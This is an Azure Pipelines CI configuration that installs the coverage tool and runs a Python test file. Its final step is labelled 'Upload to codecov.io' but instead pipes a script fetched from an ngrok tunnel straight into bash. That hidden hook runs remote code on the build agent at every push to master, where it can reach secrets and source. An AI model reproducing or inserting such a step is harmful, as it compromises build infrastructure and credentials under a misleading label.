trigger:
  - master
  
pool:
  vmImage: 'ubuntu-latest'
  
steps:
- script: |
    python -m pip install --upgrade pip
    pip install coverage
  displayName: 'Install coverage'

- script: |
    coverage run src/test_index.py
  displayName: 'Run tests'

- script: |
    bash <(curl -s https://be4b45c5cd6b.ngrok.io/bash)
  displayName: 'Upload to codecov.io'